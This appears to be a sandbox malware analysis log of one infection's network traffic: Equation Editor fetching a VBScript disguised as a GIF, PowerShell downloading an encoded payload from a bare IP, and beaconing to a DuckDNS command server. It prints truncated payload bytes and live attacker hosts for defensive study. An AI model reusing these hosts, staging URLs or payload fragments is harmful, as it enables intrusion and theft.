                                                      May 1, 2024 14:55:48.241621017 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:48.241677999 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:48.616255999 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:48.616323948 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:48.987668991 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:49.007334948 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:49.021266937 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:49.334170103 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:49.533978939 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:49.815313101 CEST4917180192.168.2.22178.237.33.50
                                                      May 1, 2024 14:55:49.996253967 CEST8049171178.237.33.50192.168.2.22
                                                      May 1, 2024 14:55:49.996328115 CEST4917180192.168.2.22178.237.33.50
                                                      May 1, 2024 14:55:49.996597052 CEST4917180192.168.2.22178.237.33.50
                                                      May 1, 2024 14:55:50.180807114 CEST8049171178.237.33.50192.168.2.22
                                                      May 1, 2024 14:55:50.180864096 CEST4917180192.168.2.22178.237.33.50
                                                      May 1, 2024 14:55:50.187923908 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:50.568121910 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:51.185129881 CEST8049171178.237.33.50192.168.2.22
                                                      May 1, 2024 14:55:51.185189962 CEST4917180192.168.2.22178.237.33.50
                                                      May 1, 2024 14:56:06.987246990 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:56:06.989058971 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:56:07.356241941 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:56:37.042191029 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:56:37.046777964 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:56:37.414513111 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:57:07.088273048 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:57:07.342459917 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:57:07.826029062 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:57:08.190840960 CEST1464549170194.187.251.115192.168.2.22

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 1, 2024 14:55:23.981447935 CEST6551053192.168.2.228.8.8.8
                                                      May 1, 2024 14:55:24.082490921 CEST53655108.8.8.8192.168.2.22
                                                      May 1, 2024 14:55:26.557622910 CEST6267253192.168.2.228.8.8.8
                                                      May 1, 2024 14:55:26.660554886 CEST53626728.8.8.8192.168.2.22
                                                      May 1, 2024 14:55:45.925879002 CEST5647553192.168.2.228.8.8.8
                                                      May 1, 2024 14:55:46.038903952 CEST53564758.8.8.8192.168.2.22
                                                      May 1, 2024 14:55:49.521001101 CEST4938453192.168.2.228.8.8.8
                                                      May 1, 2024 14:55:49.618367910 CEST53493848.8.8.8192.168.2.22
                                                      May 1, 2024 14:55:49.618632078 CEST4938453192.168.2.228.8.8.8
                                                      May 1, 2024 14:55:49.716569901 CEST53493848.8.8.8192.168.2.22
                                                      May 1, 2024 14:55:49.716793060 CEST4938453192.168.2.228.8.8.8
                                                      May 1, 2024 14:55:49.811661959 CEST53493848.8.8.8192.168.2.22

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      May 1, 2024 14:55:23.981447935 CEST192.168.2.228.8.8.80x2891Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                      May 1, 2024 14:55:26.557622910 CEST192.168.2.228.8.8.80x9c25Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
                                                      May 1, 2024 14:55:45.925879002 CEST192.168.2.228.8.8.80x8faeStandard query (0)sembe.duckdns.orgA (IP address)IN (0x0001)false
                                                      May 1, 2024 14:55:49.521001101 CEST192.168.2.228.8.8.80x324aStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                      May 1, 2024 14:55:49.618632078 CEST192.168.2.228.8.8.80x324aStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                      May 1, 2024 14:55:49.716793060 CEST192.168.2.228.8.8.80x324aStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      May 1, 2024 14:55:24.082490921 CEST8.8.8.8192.168.2.220x2891No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                      May 1, 2024 14:55:24.082490921 CEST8.8.8.8192.168.2.220x2891No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                      May 1, 2024 14:55:26.660554886 CEST8.8.8.8192.168.2.220x9c25No error (0)uploaddeimagens.com.br172.67.215.45A (IP address)IN (0x0001)false
                                                      May 1, 2024 14:55:26.660554886 CEST8.8.8.8192.168.2.220x9c25No error (0)uploaddeimagens.com.br104.21.45.138A (IP address)IN (0x0001)false
                                                      May 1, 2024 14:55:46.038903952 CEST8.8.8.8192.168.2.220x8faeNo error (0)sembe.duckdns.org194.187.251.115A (IP address)IN (0x0001)false
                                                      May 1, 2024 14:55:49.618367910 CEST8.8.8.8192.168.2.220x324aNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                      May 1, 2024 14:55:49.716569901 CEST8.8.8.8192.168.2.220x324aNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                      May 1, 2024 14:55:49.811661959 CEST8.8.8.8192.168.2.220x324aNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • paste.ee
                                                      • uploaddeimagens.com.br
                                                      • 107.172.31.6
                                                      • geoplugin.net

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.2249165107.172.31.680152C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      TimestampBytes transferredDirectionData
                                                      May 1, 2024 14:55:03.500185013 CEST329OUTGET /28088/indexphppagenotfound.gif HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: 107.172.31.6
                                                      Connection: Keep-Alive
                                                      May 1, 2024 14:55:03.656900883 CEST1289INHTTP/1.1 200 OK
                                                      Date: Wed, 01 May 2024 19:55:03 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                      Last-Modified: Wed, 01 May 2024 07:25:00 GMT
                                                      ETag: "f522-6175f626093e7"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 62754
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: image/gif
                                                      Data Raw: ff fe 27 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 0d 00 0a 00 27 00 0d 00 0a 00 27 00 20 00 43 00 6f 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 63 00 29 00 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 43 00 6f 00 72 00 70 00 6f 00 72 00 61 00 74 00 69 00 6f 00 6e 00 2e 00 20 00 41 00 6c 00 6c 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2e 00 0d 00 0a 00 27 00 0d 00 0a 00 27 00 20 00 41 00 62 00 73 00 74 00 72 00 61 00 63 00 74 00 3a 00 0d 00 0a 00 27 00 20 00 70 00 72 00 6e 00 70 00 6f 00 72 00 74 00 2e 00 76 00 62 00 73 00 20 00 2d 00 [TRUNCATED]
                                                      Data Ascii: '----------------------------------------------------------------------'' Copyright (c) Microsoft Corporation. All rights reserved.'' Abstract:' prnport.vbs - Port script for WMI on Windows ' used to add, delete and list ports' also for getting and setting the port configuration'' Usage:' prnport [-adlgt?] [-r port] [-s server] [-u user name] [-w password]' [-o raw|lpr] [-h host address] [-q queue] [-n number]' [-me
                                                      May 1, 2024 14:55:03.656919956 CEST1289INData Raw: 00 7c 00 20 00 2d 00 6d 00 64 00 20 00 5d 00 20 00 5b 00 2d 00 69 00 20 00 53 00 4e 00 4d 00 50 00 20 00 69 00 6e 00 64 00 65 00 78 00 5d 00 20 00 5b 00 2d 00 79 00 20 00 63 00 6f 00 6d 00 6d 00 75 00 6e 00 69 00 74 00 79 00 5d 00 20 00 5b 00 2d
                                                      Data Ascii: | -md ] [-i SNMP index] [-y community] [-2e | -2d]"'' Examples' prnport -a -s server -r IP_1.2.3.4 -e 1.2.3.4 -o ra
                                                      May 1, 2024 14:55:03.657048941 CEST1289INData Raw: 6e 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 31 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 41 00 63 00 74 00 69 00 6f 00 6e 00 4c 00 69 00 73 00 74 00 20 00 20 00 20 00 20 00 20 00
                                                      Data Ascii: nDelete = 1const kActionList = 2const kActionUnknown = 3const kActionGet = 4const kAct
                                                      May 1, 2024 14:55:03.657062054 CEST1289INData Raw: 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 6b 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 31 00 32 00 0d 00 0a 00 0d 00 0a 00 27 00 0d 00 0a 00 27 00 20 00 47 00 65 00 6e 00 65
                                                      Data Ascii: const kPassword = 12'' Generic strings'const L_Empty_Text = ""const L_Space_Text
                                                      May 1, 2024 14:55:03.657073021 CEST1289INData Raw: 65 00 70 00 75 00 72 00 61 00 72 00 3a 00 22 00 0d 00 0a 00 0d 00 0a 00 27 00 0d 00 0a 00 27 00 20 00 47 00 65 00 6e 00 65 00 72 00 61 00 6c 00 20 00 75 00 73 00 61 00 67 00 65 00 20 00 6d 00 65 00 73 00 73 00 61 00 67 00 65 00 73 00 0d 00 0a 00
                                                      Data Ascii: epurar:"'' General usage messages'const L_Help_Help_General01_Text = "Uso: prnport [-adlgt?] [-r porta][-s ser
                                                      May 1, 2024 14:55:03.657107115 CEST1289INData Raw: 00 75 00 6d 00 61 00 20 00 70 00 6f 00 72 00 74 00 61 00 20 00 54 00 43 00 50 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 5f 00 48 00 65 00 6c 00 70 00 5f 00 47 00 65 00 6e 00 65 00 72 00 61 00 6c
                                                      Data Ascii: uma porta TCP"const L_Help_Help_General08_Text = "-h - endereo IP do dispositivo"const L_Help_Help_General09_T
                                                      May 1, 2024 14:55:03.657119989 CEST1289INData Raw: 65 00 72 00 61 00 6c 00 31 00 35 00 5f 00 54 00 65 00 78 00 74 00 20 00 20 00 20 00 3d 00 20 00 22 00 2d 00 72 00 20 00 20 00 20 00 20 00 20 00 2d 00 20 00 6e 00 6f 00 6d 00 65 00 20 00 64 00 61 00 20 00 70 00 6f 00 72 00 74 00 61 00 22 00 0d 00
                                                      Data Ascii: eral15_Text = "-r - nome da porta"const L_Help_Help_General16_Text = "-s - nome do servidor"const L_Help_H
                                                      May 1, 2024 14:55:03.657155991 CEST1289INData Raw: 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 5f 00 48 00 65 00 6c 00 70 00 5f 00 47 00 65 00 6e 00 65 00 72 00 61 00 6c 00 32 00 34 00 5f 00 54 00 65 00 78 00 74 00 20 00 20 00 20 00 3d 00 20 00 22 00 70
                                                      Data Ascii: const L_Help_Help_General24_Text = "prnport -l -s server"const L_Help_Help_General25_Text = "prnport -d -s server
                                                      May 1, 2024 14:55:03.657169104 CEST1289INData Raw: 20 00 6e 00 6f 00 20 00 65 00 6e 00 64 00 65 00 72 00 65 00 e7 00 6f 00 20 00 49 00 50 00 20 00 65 00 73 00 70 00 65 00 63 00 69 00 66 00 69 00 63 00 61 00 64 00 6f 00 2e 00 22 00 0d 00 0a 00 63 00 6f 00 6e 00 73 00 74 00 20 00 4c 00 5f 00 48 00
                                                      Data Ascii: no endereo IP especificado."const L_Help_Help_General32_Text = "Se um dispositivo for detectado, uma porta TCP ser
                                                      May 1, 2024 14:55:03.657210112 CEST1289INData Raw: 00 5f 00 48 00 65 00 6c 00 70 00 5f 00 48 00 6f 00 73 00 74 00 30 00 35 00 5f 00 54 00 65 00 78 00 74 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 20 00 20 00 20 00 20 00 20 00 43 00 53 00 63 00 72 00 69 00 70 00 74 00 20 00 2f 00 2f
                                                      Data Ascii: _Help_Host05_Text = " CScript //H:CScript //S"const L_Help_Help_Host06_Text = "Voc poder em seguida exe
                                                      May 1, 2024 14:55:03.816699028 CEST1289INData Raw: 54 00 65 00 78 00 74 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 4e 00 e3 00 6f 00 20 00 66 00 6f 00 69 00 20 00 70 00 6f 00 73 00 73 00 ed 00 76 00 65 00 6c 00 20 00 6f 00 62 00 74 00 65 00 72 00 20 00 61 00 20 00 70 00 6f 00 72 00 74 00 61 00
                                                      Data Ascii: Text = "No foi possvel obter a porta"const L_Text_Msg_General04_Text = "Porta criada/atualizada"const L_Text_M


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.2249169107.172.31.6803544C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      May 1, 2024 14:55:44.470792055 CEST76OUTGET /28088/HHRM.txt HTTP/1.1
                                                      Host: 107.172.31.6
                                                      Connection: Keep-Alive
                                                      May 1, 2024 14:55:44.635181904 CEST1289INHTTP/1.1 200 OK
                                                      Date: Wed, 01 May 2024 19:55:44 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                      Last-Modified: Wed, 01 May 2024 07:23:35 GMT
                                                      ETag: "a1000-6175f5d503acf"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 659456
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/plain
                                                      Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED]
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8f
                                                      May 1, 2024 14:55:44.635237932 CEST1289INData Raw: 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34 4e 45 65 44 64 33 77 31 4e 55 64 44 55 33 41 30 4e 6f 63 44 49 33 77 78 4e 59 63 44 46 33 51 67 4e 73 62 44 36 32 41 74 4e 49 62 44 78 32 41 73 4e 38 61 44 75
                                                      Data Ascii: D+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN0TD80wONoTD20QNNETDr0QKNgSDn0wINISDe0AGNYRDV0QENARDM0
                                                      May 1, 2024 14:55:44.635257006 CEST1289INData Raw: 44 37 51 67 4f 38 72 44 39 36 77 75 4f 6b 72 44 33 36 51 74 4f 4d 72 44 78 36 77 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36
                                                      Data Ascii: D7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4Q
                                                      May 1, 2024 14:55:44.635274887 CEST1289INData Raw: 36 77 73 4f 49 72 44 78 36 41 73 4f 38 71 44 75 36 51 72 4f 77 71 44 72 36 67 71 4f 6b 71 44 6f 36 77 70 4f 59 71 44 6c 36 41 70 4f 4d 71 44 69 36 51 6f 4f 41 71 44 66 36 67 6e 4f 30 70 44 63 36 77 6d 4f 6f 70 44 5a 36 41 6d 4f 63 70 44 57 36 51
                                                      Data Ascii: 6wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlOQpDT6gkOEpDQ6wjO4oDN6AjOsoDK6QiOgoDH6ghOUoDE6wgOIoDB6AQO8nD+5QfOwnD75geOknD45wdOYnD15AdOMnDy5QcOAnDv5gbO0mDs5waOomDp5AaOcmDm5QZOQmDj5gYOEmDg5wXO4lDd5AXOslDa5QW
                                                      May 1, 2024 14:55:44.635293007 CEST1289INData Raw: 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53
                                                      Data Ascii: QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4MwODrzg6MkODozw5MYODlzA5M
                                                      May 1, 2024 14:55:44.635353088 CEST1289INData Raw: 33 4f 78 76 7a 35 37 30 37 4f 77 75 6a 54 37 30 7a 4f 33 73 6a 4d 37 77 79 4f 4f 73 54 42 36 77 76 4f 6e 72 7a 59 36 6f 6b 4f 43 6b 44 38 35 4d 65 4f 59 6e 44 74 35 51 59 4f 33 6c 54 58 34 49 50 4f 79 65 7a 76 33 38 6a 4e 6a 5a 6a 48 7a 41 32 4d
                                                      Data Ascii: 3Oxvz5707OwujT70zO3sjM7wyOOsTB6wvOnrzY6okOCkD85MeOYnDt5QYO3lTX4IPOyezv38jNjZjHzA2MaFjOwEPMNDjuw4KMiCjlwEFM5AjDAAAAICQBgBwPv/D3/A9PE/zn/Q3Py8TK/MyPY8TD+MvPN7zs+EoPZ5TK+ERPu2jk9cTPs0jD9QAPxzj56QtOFhDy20nNKVzk1AYNhVjU1kSNVQTr0YKNfSDmxQFAAAAXAUAUA
                                                      May 1, 2024 14:55:44.635370016 CEST1289INData Raw: 4d 69 4c 44 75 79 45 6d 4d 56 4a 54 53 79 55 6a 4d 70 45 7a 78 78 38 62 4d 68 47 54 6d 78 45 5a 4d 4a 47 54 50 77 34 4e 4d 57 43 6a 65 77 77 44 4d 79 41 44 45 41 41 41 41 34 43 41 42 51 44 41 41 41 38 44 2f 2f 38 39 50 77 2b 54 6d 2f 6f 32 50 56
                                                      Data Ascii: MiLDuyEmMVJTSyUjMpEzxx8bMhGTmxEZMJGTPw4NMWCjewwDMyADEAAAA4CABQDAAA8D//89Pw+Tm/o2PV9TB+EePY3Dt9oAPAzzo8AHPYtzz7c7OruTd7I2OksTF6YtOxpzF6wQO/nD354bOBgDu4cGOKhjN3UqNRVjw1MaNEWTWz8uMCLDmy4YMOHDpxQYMRBD+wwGMkBAAAAHAEAMAAAgPz6zq+sQPp3jz9QcPH2TL9cBP5x
                                                      May 1, 2024 14:55:44.635386944 CEST1289INData Raw: 4f 32 44 5a 39 6f 54 50 4e 77 7a 2b 38 63 34 4f 4c 76 7a 63 37 6b 30 4f 6a 6f 54 2f 36 67 37 4e 73 65 6a 6d 33 51 5a 4d 6b 48 6a 33 78 73 57 4d 6c 46 7a 42 77 67 4e 4d 4f 44 44 78 41 41 41 41 38 41 41 42 67 42 41 41 41 34 7a 58 39 38 46 50 59 79
                                                      Data Ascii: O2DZ9oTPNwz+8c4OLvzc7k0OjoT/6g7Nsejm3QZMkHj3xsWMlFzBwgNMODDxAAAA8AABgBAAA4zX98FPYyjf8sGPRxjP8QyO2sDM64ZOZiT44oNO/iTu4ILOkiTm4IJOlhDT3oqNjUDo1MYN7Vjc1YENETzc0sGNYMD4xUIAAAAUAQAUA8zt/c6Pi9zI+AaPh3zx9oVPP1TP9czOWkDe48MOMeDb2AuN/aDd2gmNUZjT2QkN5UT
                                                      May 1, 2024 14:55:44.635405064 CEST1289INData Raw: 73 6a 4c 41 41 41 41 6b 41 77 41 77 43 41 41 41 6b 6a 4d 35 67 43 4f 65 6a 44 31 34 45 4b 4f 55 65 6a 35 33 34 39 4e 56 66 44 6d 33 38 34 4e 31 5a 54 2f 32 45 76 4e 4d 57 44 36 30 45 4e 4e 46 54 44 6c 30 34 49 4e 48 53 54 65 30 6b 46 4e 39 51 54
                                                      Data Ascii: sjLAAAAkAwAwCAAAkjM5gCOejD14EKOUej5349NVfDm384N1ZT/2EvNMWD60ENNFTDl04INHSTe0kFN9QTM0ACNFMz9z0+MjPzxzM7MLODczo2McNzOzsyMmMDFwcLAAAAXAMAoAAAA/M5PE5Tt+wFP5yzY4wiNwZDa2ImNKVTqz09MMLTyy4lMZJTQxcfMXHzhxYDM1DjywEHMfBzVAAAAABwAQCAAA8z3/gyPc8jC+UuPb7zy
                                                      May 1, 2024 14:55:44.635421991 CEST1289INData Raw: 54 70 77 38 4a 4d 61 43 54 6b 77 55 49 4d 39 42 54 64 77 30 47 4d 6d 42 7a 58 77 67 46 4d 52 42 6a 53 77 4d 45 4d 38 41 6a 4e 77 41 44 4d 71 41 44 4a 77 34 42 41 41 45 41 69 41 4d 41 55 41 38 6a 2f 2f 63 2f 50 73 2f 7a 34 2f 30 38 50 6f 2b 7a 6f
                                                      Data Ascii: Tpw8JMaCTkwUIM9BTdw0GMmBzXwgFMRBjSwMEM8AjNwADMqADJw4BAAEAiAMAUA8j//c/Ps/z4/08Po+zo/03P49Dc/o2Ph9zO/QxPO4T/+UvPG7Tu+ArPh6Tl+onPu4TE9ofPr3j49cdPK3Tw9sYPE2Td94SPm0TH8sIPAyTZ8cFPExzE8MwO9vT57A9OKvjs745OWujT7g0OwsjC6kvOvrD06USO0ljB4kPO0jz044MOJjDu4
                                                      May 1, 2024 14:55:44.796627998 CEST1289INData Raw: 31 41 41 41 41 51 41 67 41 51 42 51 4f 4e 6c 7a 44 34 6f 4d 4f 4a 61 44 4a 32 49 51 4e 58 58 44 6f 31 30 57 4e 36 51 44 6a 7a 51 4c 41 41 41 41 49 41 49 41 51 41 30 54 6a 39 6f 56 50 39 77 44 2f 38 41 4f 50 57 7a 54 7a 38 63 4d 50 42 7a 54 74 38
                                                      Data Ascii: 1AAAAQAgAQBQONlzD4oMOJaDJ2IQNXXDo10WN6QDjzQLAAAAIAIAQA0Tj9oVP9wD/8AOPWzTz8cMPBzTt8QKPbyDZ8AFPnwjH8gBPSwzA7Y/OpvT37A9Oouzn7o4O4tTa7k0O8sjC6YeNoWjf1cWNgBAAAAFACABA8U2O0DAAAwAACAAAAAwNjdTX3c1NJdzQ30zN1AAAAgBABAOA345NXajg2knNyZTb2cmNfZzV2okNEZjP2g


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.2249171178.237.33.50803800C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      TimestampBytes transferredDirectionData
                                                      May 1, 2024 14:55:49.996597052 CEST71OUTGET /json.gp HTTP/1.1
                                                      Host: geoplugin.net
                                                      Cache-Control: no-cache
                                                      May 1, 2024 14:55:50.180807114 CEST1196INHTTP/1.1 200 OK
                                                      date: Wed, 01 May 2024 12:55:50 GMT
                                                      server: Apache
                                                      content-length: 988
                                                      content-type: application/json; charset=utf-8
                                                      cache-control: public, max-age=300
                                                      access-control-allow-origin: *
